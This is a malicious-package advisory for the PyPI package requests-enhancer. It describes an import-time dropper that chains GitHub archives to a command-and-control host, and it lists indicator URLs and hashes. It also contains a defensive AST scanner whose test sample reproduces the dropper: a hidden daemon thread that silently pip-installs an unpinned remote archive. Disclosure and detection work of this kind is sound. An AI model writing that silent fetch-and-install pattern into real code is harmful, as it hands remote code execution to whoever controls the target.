MAL-2026-6247
Vulnerability from ossf_malicious_packages
Published: 2026-06-20 23:24
Modified: 2026-06-23 16:56
Summary: Malicious code in requests-enhancer (PyPI)
Details


Source: amazon-inspector (a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd)

On import requests_enhancer, the package's __init__.py spawns a daemon thread that runs pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip via subprocess.run([sys.executable, '-m', 'pip', 'install',...]). The target is a mutable master-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo's setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer's machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare except Exception: pass, and the work is done on a daemon thread so the import returns immediately — making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.

Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)

A malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from the GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects to node22.lunes[.]host:3258 and downloads an encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits the next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-lived generated tokens are used.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-requests-enhancer

Reasons (based on the campaign):

  • backdoor

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • obfuscation

  • The malicious code is intentionally included in a dependency of the package.

  • The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
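The two source descriptions above agree on the shape of the dropper: a module-level call at import time, a `subprocess` invocation of `pip install` pointed at an unpinned branch archive, output sent to `DEVNULL`, a bare `except Exception: pass`, and a daemon thread. The following is an added example, not code from the advisory or from either reporter, of a small AST-based triage check that looks for exactly those traits in a package's `__init__.py`. The `SUSPICIOUS_INIT` and `BENIGN_INIT` inputs are constructed samples, the archive URL in them is a placeholder rather than the real indicator, and the finding labels and the `scan_module` function name are this example's own choices.

```python
import ast
import re
import textwrap

# Constructed sample that mirrors the import-time dropper shape the report
# describes. The URL is a placeholder, not the real indicator from the advisory.
SUSPICIOUS_INIT = textwrap.dedent('''
    import subprocess, sys, threading

    def _helper():
        try:
            subprocess.run(
                [sys.executable, "-m", "pip", "install",
                 "https://github.com/example-org/example-repo/archive/refs/heads/master.zip"],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        except Exception:
            pass

    threading.Thread(target=_helper, daemon=True).start()
''')

# Constructed benign module for comparison: no runtime pip, nothing at import time.
BENIGN_INIT = textwrap.dedent('''
    import requests

    def get(url, **kw):
        return requests.get(url, timeout=10, **kw)
''')

# A remote pip target counts as unpinned when it references a moving branch
# (refs/heads, main/master archive, or @main/@master) and carries neither a
# 40-hex commit SHA nor a #sha256= hash fragment.
UNPINNED_RE = re.compile(r"/archive/refs/heads/|/archive/(main|master)\.zip$|@(main|master)\b")
PINNED_RE = re.compile(r"[0-9a-f]{40}|#sha256=")

SUBPROCESS_FUNCS = {"run", "Popen", "call", "check_call", "check_output"}


def _is_subprocess_call(call: ast.Call) -> bool:
    f = call.func
    return (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)
            and f.value.id == "subprocess" and f.attr in SUBPROCESS_FUNCS)


def _pip_install_targets(call: ast.Call) -> list[str]:
    """Return the remote targets of an argv list that spells 'pip install <target>'."""
    if not call.args or not isinstance(call.args[0], (ast.List, ast.Tuple)):
        return []
    parts = [e.value for e in call.args[0].elts
             if isinstance(e, ast.Constant) and isinstance(e.value, str)]
    if "pip" in parts and "install" in parts:
        return [p for p in parts if p.startswith(("http://", "https://", "git+"))]
    return []


def scan_module(source: str) -> list[str]:
    """Return a sorted list of dropper-like traits found in the module source."""
    findings = set()
    tree = ast.parse(source)

    # Anything executed at module level runs on `import`; record it.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            findings.add(f"import-time-call: {ast.unparse(stmt.value)}")

    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _is_subprocess_call(node):
            for target in _pip_install_targets(node):
                findings.add(f"pip-install-at-runtime: {target}")
                if UNPINNED_RE.search(target) and not PINNED_RE.search(target):
                    findings.add(f"unpinned-remote-target: {target}")
            for kw in node.keywords:
                if (kw.arg in ("stdout", "stderr") and isinstance(kw.value, ast.Attribute)
                        and kw.value.attr == "DEVNULL"):
                    findings.add(f"output-silenced: {kw.arg}")
        elif isinstance(node, ast.ExceptHandler):
            broad = node.type is None or (
                isinstance(node.type, ast.Name) and node.type.id in ("Exception", "BaseException"))
            if broad and len(node.body) == 1 and isinstance(node.body[0], ast.Pass):
                findings.add("errors-swallowed: bare except ... pass")
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
              and node.func.attr == "Thread"):
            for kw in node.keywords:
                if kw.arg == "daemon" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                    findings.add("daemon-thread: work detached from import")
    return sorted(findings)


if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_INIT), ("benign", BENIGN_INIT)):
        print(name, scan_module(src))
```

No single finding here is proof of malice; a legitimate package might silence subprocess output, for instance. The combination of a runtime `pip install`, an unpinned remote target and an import-time call is the signal worth escalating, and a pinned target (commit SHA or `#sha256=` fragment) is deliberately reported only as `pip-install-at-runtime`, not as unpinned.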

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "requests_enhancer/__init__.py",
              "sha256": "fa1dee5f2f9b803d0303197b4168dd45b00fbd973ebd89bf671fec6a8b908219",
              "tlsh": "f421113ad4241473c185c2d3182496131ff7651bbb0258bc70ee5b640fee4a68660176"
            }
          ],
          "package_integrity": [
            {
              "filename": "requests_enhancer-1.4.2-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "41e14d1267695ec2105fee0869e13ee1e537f3113fd3f834b9ed4639764cdf0e",
                "md5": "10659dd20eaf203ccee3624e4e37dfdd",
                "sha256": "995ee49151cc2c2ef32531983153c8d2e4c57dbfe4bab6944b34241cbe92b63b"
              }
            },
            {
              "filename": "requests_enhancer-1.4.2.tar.gz",
              "hashes": {
                "blake2b_256": "53ea78c6840bf6b51be09fdd5362875143cf265f9f4217ede18164348e19f167",
                "md5": "d4af8b5f972846d0dcbe046e06c1d267",
                "sha256": "1102476ec36f1e69f6b656d1bb8d23e617cc7d4a4cad4a3748e12f06dd407635"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "requests-enhancer"
      },
      "versions": [
        "1.4.2"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "REPORTER"
    }
  ],
  "database_specific": {
    "iocs": {
      "urls": [
        "https://github.com/codexio-boop/platform_syslib/archive/refs/heads/master.zip",
        "https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip",
        "http://node22.lunes.host:3258/sync?v=",
        "http://node22.lunes.host:3258/go?n=",
        "http://node22.lunes.host:22240/update?v="
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "pypi/2026-06-requests-enhancer/requests-enhancer",
        "import_time": "2026-06-20T23:31:19.136908039Z",
        "modified_time": "2026-06-20T23:24:02.247136Z",
        "sha256": "950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62",
        "source": "kam193",
        "versions": [
          "1.4.2"
        ]
      },
      {
        "id": "IN-MAL-2026-007273",
        "import_time": "2026-06-23T16:54:13.69981833Z",
        "modified_time": "2026-06-23T16:11:35Z",
        "sha256": "a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd",
        "source": "amazon-inspector",
        "versions": [
          "1.4.2"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd)\nOn `import requests_enhancer`, the package\u0027s `__init__.py` spawns a daemon thread that runs `pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip` via `subprocess.run([sys.executable, \u0027-m\u0027, \u0027pip\u0027, \u0027install\u0027,...])`. The target is a mutable `master`-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo\u0027s setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer\u0027s machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare `except Exception: pass`, and the work is done on a daemon thread so the import returns immediately \u2014 making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.\n\n## Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)\nMalicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository \"Hexa-devy/netflow-utils\", which then attempts to download \"codexio-boop/platform_syslib\". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-requests-enhancer\n\n\nReasons (based on the campaign):\n\n\n - backdoor\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - obfuscation\n\n\n - The malicious code is intentionally included in a dependency of the package\n\n\n - The package contains code to execute remote commands (probably limited to a specific set) on the victim\u0027s machine.\n",
  "id": "MAL-2026-6247",
  "modified": "2026-06-23T16:56:10Z",
  "published": "2026-06-20T23:24:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Hexa-devy/netflow-utils/blob/4f33b53019b11b99889ec860d486d550701f6e9d/pyproject.toml#L35"
    },
    {
      "type": "WEB",
      "url": "https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/setup.py"
    },
    {
      "type": "WEB",
      "url": "https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/connkit/__init__.py"
    },
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/requests-enhancer"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/requests-enhancer/1.4.2/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in requests-enhancer (PyPI)"
}